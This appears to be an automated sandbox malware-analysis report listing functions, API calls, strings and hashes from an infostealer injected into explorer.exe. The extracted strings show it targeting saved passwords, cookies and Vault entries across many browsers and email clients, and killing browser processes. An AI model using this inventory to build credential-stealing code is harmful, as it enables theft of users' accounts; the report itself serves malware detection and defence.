API ID: std::_$Locimp::_std::locale::_$LocimpLocinfoLockit$AddfacClearConcurrency::cancellation_token::_Locimp_Locinfo::_Locinfo::~_Lockit::_Lockit::~_New___int64_aligned_msizecodecvtcollatemallocstd::locale::c_str
String ID:
API String ID: 1811419688-0
Opcode ID: 7af322f36f17e67862f741fc24bfc0139ff588b013d2130c712c45a990bd171e
Instruction ID: 91733621338c9b5440a44037705cbb496057970387940145dc0a109911d6e5bd
Opcode Fuzzy Hash: 7af322f36f17e67862f741fc24bfc0139ff588b013d2130c712c45a990bd171e
Instruction Fuzzy Hash: 38012936215F8481DB41EB2AE49139E73A2F7C8B94F409612FE9E037ABCF38C0958740

Function 000001E51ADE2180 Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 000001E51ADE21AA

Part of subcall function 000001E51ADE1F60: std::locale::facet::facet.LIBCPMTD ref: 000001E51ADE1F78

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADE21CE

Part of subcall function 000001E51ADE17E0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1801
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1813
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1825
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1837
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1849
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE185B
Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE186D
Part of subcall function 000001E51ADE17E0: std::bad_exception::bad_exception.LIBCMTD ref: 000001E51ADE1887
Part of subcall function 000001E51ADE17E0: _CxxThrowException.LIBCMT ref: 000001E51ADE1898
Part of subcall function 000001E51ADE17E0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000001E51ADE18A7

codecvt.LIBCPMTD ref: 000001E51ADE21E1

Part of subcall function 000001E51ADE23A0: std::_Locinfo::_Getcvt.LIBCPMTD ref: 000001E51ADE23CC

std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADE21EC

Part of subcall function 000001E51ADE18C0: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 000001E51ADE18CE
Part of subcall function 000001E51ADE18C0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1941

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Yarn$Locinfo::_$LocinfoLockitstd::bad_exception::bad_exception$ExceptionGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwcodecvtstd::locale::facet::facet
String ID:
API String ID: 2580637281-0
Opcode ID: adcdcac3d387f150fc2c396cd21c3c6a73979b2da0c270e4eb99f33f457a8872
Instruction ID: 90b5072c9463a7c30c8fdc9e96004994b1373203bc5035fe7df1573c3d2cf706
Opcode Fuzzy Hash: adcdcac3d387f150fc2c396cd21c3c6a73979b2da0c270e4eb99f33f457a8872
Instruction Fuzzy Hash: F5F0EC72229FC191DB61AB25F4517DE7362F7D17A4F405211AAED436EACF38C548CB01

Function 000001E5190C810C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E5190C813E

Part of subcall function 000001E5190C3424: _getptd.LIBCMT ref: 000001E5190C343A
Part of subcall function 000001E5190C3424: __updatetlocinfo.LIBCMT ref: 000001E5190C346F
Part of subcall function 000001E5190C3424: __updatetmbcinfo.LIBCMT ref: 000001E5190C3496

_malloc_crt.LIBCMT ref: 000001E5190C8189

Strings

:, xrefs: 000001E5190C81A8

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
String ID: :
API String ID: 875692556-336475711
Opcode ID: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
Instruction ID: c1e6c128f83d5d150235217ef6e3b83946c04e6832c1f20ea61eae0dd66acaca
Opcode Fuzzy Hash: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
Instruction Fuzzy Hash: 9741A731218E4C4FDB58EF28D8897F973E2F794314F4946AEAC4AC3196DE20D90286C5

Function 000001E5190C7F8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 000001E5190C8009
_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E5190C7FBE

Part of subcall function 000001E5190C3424: _getptd.LIBCMT ref: 000001E5190C343A
Part of subcall function 000001E5190C3424: __updatetlocinfo.LIBCMT ref: 000001E5190C346F
Part of subcall function 000001E5190C3424: __updatetmbcinfo.LIBCMT ref: 000001E5190C3496

Strings

:, xrefs: 000001E5190C8028

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
String ID: :
API String ID: 875692556-336475711
Opcode ID: b6f76ccc677749e7e47c8f1fd9208b4adf8ad809ee0fda7590a67167e05195a0
Instruction ID: da916b8d5daa8e6613b7a6b5f644ad2fdbbb7711bbefa768b2c4aa1dfe5b2c04
Opcode Fuzzy Hash: b6f76ccc677749e7e47c8f1fd9208b4adf8ad809ee0fda7590a67167e05195a0
Instruction Fuzzy Hash: 2741A631218E4C4FDB58EF28D8857F973E2FB54315F5946AEA84AC3196DE20A80286C5

Function 000001E51AE05D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 000001E51AE05E01
std::ios_base::getloc.LIBCPMTD ref: 000001E51AE05E22

Strings

%.0Lf, xrefs: 000001E51AE05DF1

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocswprintf
String ID: %.0Lf
API String ID: 2734600178-1402515088
Opcode ID: 0b52692e544fc50670088c299cef916147423b381afed6a016f19d8ad1928563
Instruction ID: 532205f4f8cc9ab925bfb1dfdab9f8ac0293af74fddfd5a47903375fbd33469a
Opcode Fuzzy Hash: 0b52692e544fc50670088c299cef916147423b381afed6a016f19d8ad1928563
Instruction Fuzzy Hash: EE515C32719F8086EB12DB75E8503DE63B2EB85798F504216EE5D57B9ADF38C446C700

Function 000001E51AE05944 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 000001E51AE059E5
std::ios_base::getloc.LIBCPMTD ref: 000001E51AE05A06

Strings

%.0Lf, xrefs: 000001E51AE059D5

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocswprintf
String ID: %.0Lf
API String ID: 2734600178-1402515088
Opcode ID: 4d8b598d66f7e2c92a40726d1b63a1af653c1d6d07b5135ad9993eb8cba31dca
Instruction ID: ef499addac98c1aa2a15bac25648fa71e4c98099214861c5ba65c01d8b3c234d
Opcode Fuzzy Hash: 4d8b598d66f7e2c92a40726d1b63a1af653c1d6d07b5135ad9993eb8cba31dca
Instruction Fuzzy Hash: 3B514C32719FC086EB12CB75E8403DD63B2EB89798F504216DE9957B9AEF38C046C710

Function 000001E51AE0CF6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 000001E51AE0D00B
std::ios_base::getloc.LIBCPMTD ref: 000001E51AE0D02C

Strings

%.0Lf, xrefs: 000001E51AE0CFFB

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::ios_base::getlocswprintf
String ID: %.0Lf
API String ID: 2734600178-1402515088
Opcode ID: 4ecb6063488c6e6240f3922736982e1e2cd0c6d48fa5f7eaa1debd812ab1ff6c
Instruction ID: d7a3d2378f2806dcba21cf1cdde44593a6e23967d744e8d7003a7efef50fa462
Opcode Fuzzy Hash: 4ecb6063488c6e6240f3922736982e1e2cd0c6d48fa5f7eaa1debd812ab1ff6c
Instruction Fuzzy Hash: 55517A32B19FC08AEB12CB75E4503DD67B2E799798F504216EE5927B9ADF38C04AC740

Analysis Process: explorer.exePID: 2580, Parent PID: 7192COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	53.8%
Signature Coverage:	7.8%
Total number of Nodes:	1096
Total number of Limit Nodes:	34

Executed Functions

Function 0E624B50 Relevance: 177.4, APIs: 16, Strings: 85, Instructions: 645
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0E624948: CreateToolhelp32Snapshot.KERNEL32 ref: 0E624969
Part of subcall function 0E624948: Process32First.KERNEL32 ref: 0E62498C
Part of subcall function 0E624948: GetCurrentProcessId.KERNEL32 ref: 0E62499A
Part of subcall function 0E624948: Process32Next.KERNEL32 ref: 0E624A58
Part of subcall function 0E624948: CloseHandle.KERNEL32 ref: 0E624A69

Part of subcall function 0E626E2C: GetProcessHeap.KERNEL32 ref: 0E626E30
Part of subcall function 0E626E2C: HeapAlloc.KERNEL32 ref: 0E626E42

Part of subcall function 0E628848: RegOpenKeyExA.ADVAPI32 ref: 0E62887F
Part of subcall function 0E628848: CoInitialize.OLE32 ref: 0E628891
Part of subcall function 0E628848: CoCreateInstance.OLE32 ref: 0E6288B4
Part of subcall function 0E628848: StrStrIW.SHLWAPI ref: 0E628933
Part of subcall function 0E628848: CoTaskMemFree.OLE32 ref: 0E628956
Part of subcall function 0E628848: CoTaskMemFree.OLE32 ref: 0E628965
Part of subcall function 0E628848: RegCloseKey.ADVAPI32 ref: 0E6289A1

Part of subcall function 0E6289E4: LoadLibraryA.KERNEL32 ref: 0E628A1B
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A37
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A4E
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A65
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A7C
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628A93
Part of subcall function 0E6289E4: GetProcAddress.KERNEL32 ref: 0E628AB1

Part of subcall function 0E624A90: GetProcessHeap.KERNEL32 ref: 0E624AE0
Part of subcall function 0E624A90: HeapReAlloc.KERNEL32 ref: 0E624AFA

Part of subcall function 0E626F6C: GetProcessHeap.KERNEL32 ref: 0E626F87
Part of subcall function 0E626F6C: HeapFree.KERNEL32 ref: 0E626F95
Part of subcall function 0E626F6C: GetProcessHeap.KERNEL32 ref: 0E626FA0
Part of subcall function 0E626F6C: HeapFree.KERNEL32 ref: 0E626FAE

Part of subcall function 0E6275F8: GetProcessHeap.KERNEL32 ref: 0E62765D
Part of subcall function 0E6275F8: HeapFree.KERNEL32 ref: 0E62766B

Part of subcall function 0E627C00: SHGetFolderPathA.SHELL32 ref: 0E627C3B

Part of subcall function 0E624A90: HeapAlloc.KERNEL32 ref: 0E624B06

Part of subcall function 0E62453C: lstrcpyA.KERNEL32 ref: 0E624564
Part of subcall function 0E62453C: lstrcatA.KERNEL32 ref: 0E624575
Part of subcall function 0E62453C: RegOpenKeyExA.ADVAPI32 ref: 0E624599

wsprintfA.USER32 ref: 0E6253BF

Part of subcall function 0E62453C: RegEnumKeyExA.ADVAPI32 ref: 0E6245E0
Part of subcall function 0E62453C: RegOpenKeyExA.ADVAPI32 ref: 0E624622
Part of subcall function 0E62453C: lstrcpyW.KERNEL32 ref: 0E624650
Part of subcall function 0E62453C: RegQueryValueExW.ADVAPI32 ref: 0E624686
Part of subcall function 0E62453C: RegCloseKey.ADVAPI32 ref: 0E6247A7
Part of subcall function 0E62453C: RegEnumKeyExA.ADVAPI32 ref: 0E6247DF
Part of subcall function 0E62453C: RegCloseKey.ADVAPI32 ref: 0E6247FA

SHGetFolderPathA.SHELL32 ref: 0E6254F3
lstrcatA.KERNEL32 ref: 0E625508

Part of subcall function 0E625ABC: SHGetFolderPathA.SHELL32 ref: 0E625AF7

GetProcessHeap.KERNEL32 ref: 0E625690
HeapAlloc.KERNEL32 ref: 0E6256A2
WideCharToMultiByte.KERNEL32 ref: 0E6256D2
OpenFileMappingA.KERNEL32 ref: 0E6256F3
MapViewOfFile.KERNEL32 ref: 0E625718
UnmapViewOfFile.KERNEL32 ref: 0E625724
CloseHandle.KERNEL32 ref: 0E62572D
wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E62573D
wprintf.LEGACY_STDIO_DEFINITIONS ref: 0E62574C
GetProcessHeap.KERNEL32 ref: 0E625756
HeapFree.KERNEL32 ref: 0E625764
GetProcessHeap.KERNEL32 ref: 0E62576F
HeapFree.KERNEL32 ref: 0E62577D

Strings

12345, xrefs: 0E6256E5
Safer Technologies\Secure Browser, xrefs: 0E624DC5
ff_cookie, xrefs: 0E6254C8
1IMAP Server, xrefs: 0E624EE4
1IMAP User, xrefs: 0E624F2A
@, xrefs: 0E625701
Comodo\Dragon, xrefs: 0E624CAD
1IMAP Password2, xrefs: 0E624F9A
3NNTP Password, xrefs: 0E624FEE
ff_pass, xrefs: 0E625211
2IMAP Port, xrefs: 0E624F7E
\User Data\Default\Network\Cookies, xrefs: 0E624E2E
Software\Microsoft\Office\%u.0\Outlook\Profiles, xrefs: 0E6253B4
Microsoft\Edge, xrefs: 0E624E3C
1HTTPMail User Name, xrefs: 0E624F38
1SMTP Password2, xrefs: 0E624FC4
00:39:18, xrefs: 0E625057
Chedot, xrefs: 0E624DEF
1HTTP Server URL, xrefs: 0E624F0E
7Star\7Star, xrefs: 0E624D9B
1POP3 Password2, xrefs: 0E624F8C
3SMTP Password, xrefs: 0E62500A
Google\Chrome, xrefs: 0E624C75
1SMTP User Name, xrefs: 0E624EAC
1SMTP User, xrefs: 0E624F54
Elements Browser, xrefs: 0E624DA9
\User Data\Default\Web Data, xrefs: 0E624E20
Sputnik\Sputnik, xrefs: 0E624D39
cr_pass, xrefs: 0E625193
2SMTP Port, xrefs: 0E624F70
1HTTPMail Server, xrefs: 0E624F46
Bromium, xrefs: 0E624CD7
1Email, xrefs: 0E624E66
edge_cookie, xrefs: 0E625600
Rafotech\Mustang, xrefs: 0E624DD3
outlook_pass, xrefs: 0E625383
Suhba, xrefs: 0E624DB7
1HTTP User, xrefs: 0E624F00
3IMAP Password, xrefs: 0E624FE0
Torch, xrefs: 0E624DFD
1SMTP Email Address, xrefs: 0E624E74
1HTTPMail Password2, xrefs: 0E624FB6
%s, xrefs: 0E625745
Vivaldi, xrefs: 0E624D1D
Google\Chrome SxS, xrefs: 0E624C83
%s, xrefs: 0E625736
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 0E62539B
Orbitum, xrefs: 0E624CC9
1NNTP Password2, xrefs: 0E624FA8
Superbird, xrefs: 0E624DE1
RockMelt, xrefs: 0E624D01
1IMAP User Name, xrefs: 0E624EF2
3HTTPMail Password, xrefs: 0E624FFC
Amigo, xrefs: 0E624CBB
Mar 29 2024, xrefs: 0E625094
\User Data\Default\Login Data, xrefs: 0E624E12
1NNTP Server, xrefs: 0E624ED6
\Mozilla\Firefox\Profiles\, xrefs: 0E6254FD
Yandex\YandexBrowser, xrefs: 0E624C9F
3POP3 Password, xrefs: 0E624FD2
ie_cookie, xrefs: 0E625590
cookies.sqlite, xrefs: 0E625527
Nichrome, xrefs: 0E624CF3
Chromium, xrefs: 0E624CE5
build, xrefs: 0E6250DB
ie_pass, xrefs: 0E62528D
QIP Surf, xrefs: 0E624D63
2POP3 Port, xrefs: 0E624F62
Epic Privacy Browser, xrefs: 0E624D71
uCozMedia\Uran, xrefs: 0E624D55
1POP3 User Name, xrefs: 0E624E9E
1NNTP Email Address, xrefs: 0E624EBA
edge_pass, xrefs: 0E625305
1NNTP User Name, xrefs: 0E624EC8
w~y&, xrefs: 0E624BBF
1SMTP Server, xrefs: 0E624E82
Go!, xrefs: 0E624D2B
Kometa, xrefs: 0E624D47
Xpom, xrefs: 0E624C91
1POP3 User, xrefs: 0E624F1C
CentBrowser, xrefs: 0E624D8D
360Browser\Browser, xrefs: 0E624D0F
CocCoc\Browser, xrefs: 0E624D7F
1POP3 Server, xrefs: 0E624E90
cr_cookie, xrefs: 0E62544A

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$Free$AddressProc$Close$AllocOpen$FileFolderPath$CreateEnumHandleProcess32TaskViewlstrcatlstrcpywprintf$ByteCharCurrentFirstInitializeInstanceLibraryLoadMappingMultiNextQuerySnapshotToolhelp32UnmapValueWidewsprintf
String ID: %s$%s$00:39:18$12345$1Email$1HTTP Server URL$1HTTP User$1HTTPMail Password2$1HTTPMail Server$1HTTPMail User Name$1IMAP Password2$1IMAP Server$1IMAP User$1IMAP User Name$1NNTP Email Address$1NNTP Password2$1NNTP Server$1NNTP User Name$1POP3 Password2$1POP3 Server$1POP3 User$1POP3 User Name$1SMTP Email Address$1SMTP Password2$1SMTP Server$1SMTP User$1SMTP User Name$2IMAP Port$2POP3 Port$2SMTP Port$360Browser\Browser$3HTTPMail Password$3IMAP Password$3NNTP Password$3POP3 Password$3SMTP Password$7Star\7Star$@$Amigo$Bromium$CentBrowser$Chedot$Chromium$CocCoc\Browser$Comodo\Dragon$Elements Browser$Epic Privacy Browser$Go!$Google\Chrome$Google\Chrome SxS$Kometa$Mar 29 2024$Microsoft\Edge$Nichrome$Orbitum$QIP Surf$Rafotech\Mustang$RockMelt$Safer Technologies\Secure Browser$Software\Microsoft\Office\%u.0\Outlook\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$Sputnik\Sputnik$Suhba$Superbird$Torch$Vivaldi$Xpom$Yandex\YandexBrowser$\Mozilla\Firefox\Profiles\$\User Data\Default\Login Data$\User Data\Default\Network\Cookies$\User Data\Default\Web Data$build$cookies.sqlite$cr_cookie$cr_pass$edge_cookie$edge_pass$ff_cookie$ff_pass$ie_cookie$ie_pass$outlook_pass$uCozMedia\Uran$w~y&
API String ID: 3620056986-83399204
Opcode ID: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
Instruction ID: 41ed2ca6ce92c71a7090c522592f30c92d3558c2e8241c1fbdfabd9859ea3eb8
Opcode Fuzzy Hash: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
Instruction Fuzzy Hash: CB622535605F9295EA11EF24FC903DD33A4FB65B84F80193A895E27768EF3ACA48C744

Function 03112164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206
pipefileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNEL32 ref: 03112233
SetHandleInformation.KERNEL32 ref: 0311224D
CreatePipe.KERNEL32 ref: 0311226E
SetHandleInformation.KERNEL32 ref: 03112288
CreatePipe.KERNEL32 ref: 031122A9
SetHandleInformation.KERNEL32 ref: 031122C3
CreateProcessW.KERNEL32 ref: 03112385

Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

PeekNamedPipe.KERNEL32 ref: 03112434
ReadFile.KERNEL32 ref: 03112490
PeekNamedPipe.KERNEL32 ref: 031124E4
ReadFile.KERNEL32 ref: 03112540
GetExitCodeProcess.KERNEL32 ref: 03112579
TerminateProcess.KERNEL32 ref: 031125AA
CloseHandle.KERNEL32 ref: 031125B8

Part of subcall function 0311C704: NtDelayExecution.NTDLL ref: 0311C726

CloseHandle.KERNEL32 ref: 031125C6
CloseHandle.KERNEL32 ref: 031125D4
CloseHandle.KERNEL32 ref: 031125E2

Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5

Strings

h, xrefs: 031122C9

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
String ID: h
API String ID: 30365702-2439710439
Opcode ID: 860013f4a01bfb73d4a4f28ae6cd5b482c5936efda44fe53a241f8bb7cd9ace6
Instruction ID: 256e1f58b624ab2aad592158851e41898866028e99cf1d5ec581019a8b9557e4
Opcode Fuzzy Hash: 860013f4a01bfb73d4a4f28ae6cd5b482c5936efda44fe53a241f8bb7cd9ace6
Instruction Fuzzy Hash: BBC1CE36218BC08AE760CB65F49479BB7A1F3C8754F408526EA8987A68DFBCC559CF40

Function 0E6289E4 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 206
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0E628A1B
GetProcAddress.KERNEL32 ref: 0E628A37
GetProcAddress.KERNEL32 ref: 0E628A4E
GetProcAddress.KERNEL32 ref: 0E628A65
GetProcAddress.KERNEL32 ref: 0E628A7C
GetProcAddress.KERNEL32 ref: 0E628A93
GetProcAddress.KERNEL32 ref: 0E628AB1
FreeLibrary.KERNEL32 ref: 0E628B02

Strings

VaultEnumerateVaults, xrefs: 0E628A2D
VaultGetItem, xrefs: 0E628A82
vaultcli.dll, xrefs: 0E628A14
VaultCloseVault, xrefs: 0E628A54
pass, xrefs: 0E628C3A
ie_vault, xrefs: 0E628C33
VaultEnumerateItems, xrefs: 0E628A6B
VaultOpenVault, xrefs: 0E628A3D
VaultFree, xrefs: 0E628A99

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultOpenVault$ie_vault$pass$vaultcli.dll
API String ID: 2449869053-2044244656
Opcode ID: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
Instruction ID: 4ae451774819149d1c32e4aabfda664e377c1c5926485f8d5a037db52172b7f1
Opcode Fuzzy Hash: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
Instruction Fuzzy Hash: B0914772711F958AEB14DF65FC643A923B0F759B88F50092ACE5A63B28DF39C8098740

Function 0E626604 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyA.KERNEL32 ref: 0E626633
lstrlenA.KERNEL32 ref: 0E62663E
lstrcatA.KERNEL32 ref: 0E626662
lstrcatA.KERNEL32 ref: 0E626674
FindFirstFileA.KERNEL32 ref: 0E626683
lstrcpyA.KERNEL32 ref: 0E6266D2
lstrcatA.KERNEL32 ref: 0E6266E8
lstrcatA.KERNEL32 ref: 0E6266F7
lstrcatA.KERNEL32 ref: 0E626709
StrStrIA.SHLWAPI ref: 0E626791
lstrcpyA.KERNEL32 ref: 0E6267A8
lstrcatA.KERNEL32 ref: 0E6267BE
lstrcatA.KERNEL32 ref: 0E6267CD
FindNextFileA.KERNEL32 ref: 0E62680B
FindClose.KERNEL32 ref: 0E62681C

Strings

\, xrefs: 0E626649
*.*, xrefs: 0E626668

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: lstrcat$Findlstrcpy$File$CloseFirstNextlstrlen
String ID: *.*$\
API String ID: 2453054391-2874222586
Opcode ID: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
Instruction ID: f1113734fa901018e2b31c8867357c4ed552deacf68c717294ff53b68f13f296
Opcode Fuzzy Hash: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
Instruction Fuzzy Hash: BA519E32204AD19ADF20CF24F8587ED33B1F795B98F545525EA8E57AA8DF39C948CB00

Function 0E6B9708 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 366
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0E6B9746

Part of subcall function 0E6B8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8EA0

_get_daylight.LIBCMT ref: 0E6B9735

Part of subcall function 0E6B8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8F00

_get_daylight.LIBCMT ref: 0E6B997B
_get_daylight.LIBCMT ref: 0E6B998C
_get_daylight.LIBCMT ref: 0E6B999D
GetTimeZoneInformation.KERNEL32 ref: 0E6B99C4
WideCharToMultiByte.KERNEL32 ref: 0E6B9A5A
WideCharToMultiByte.KERNEL32 ref: 0E6B9AA6

Strings

?, xrefs: 0E6B9A99
-, xrefs: 0E6B980B
Eastern Standard Time, xrefs: 0E6B9A2E
:, xrefs: 0E6B983C
:, xrefs: 0E6B9866
Eastern Summer Time, xrefs: 0E6B9A85

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
String ID: -$:$:$?$Eastern Standard Time$Eastern Summer Time
API String ID: 3440502458-2354618740
Opcode ID: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
Instruction ID: 671b32130159603d2fc0adc8f958772c4f0734dce520a7c095d1b47793155dbb
Opcode Fuzzy Hash: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
Instruction Fuzzy Hash: A2D122362107908AD724DF31F8507DA7BA6F7CA7D8F485529EB5A47B58DB38C882C700

Function 0E624948 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0E624969
Process32First.KERNEL32 ref: 0E62498C
GetCurrentProcessId.KERNEL32 ref: 0E62499A
OpenProcess.KERNEL32 ref: 0E6249C9
StrStrIA.SHLWAPI ref: 0E6249E3
StrStrIA.SHLWAPI ref: 0E624A00
StrStrIA.SHLWAPI ref: 0E624A1E
TerminateProcess.KERNEL32 ref: 0E624A41
CloseHandle.KERNEL32 ref: 0E624A4A
Process32Next.KERNEL32 ref: 0E624A58
CloseHandle.KERNEL32 ref: 0E624A69

Strings

msedge.exe, xrefs: 0E624A0E
iexplore.exe, xrefs: 0E6249F1
chrome.exe, xrefs: 0E6249D7

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Process$CloseHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32
String ID: chrome.exe$iexplore.exe$msedge.exe
API String ID: 477742948-2002101784
Opcode ID: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
Instruction ID: 1a3c93a0fd1bb20f5c7a28eb2e08af373ecda5b4af6ad46e3aa6e9890ee5f4c5
Opcode Fuzzy Hash: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
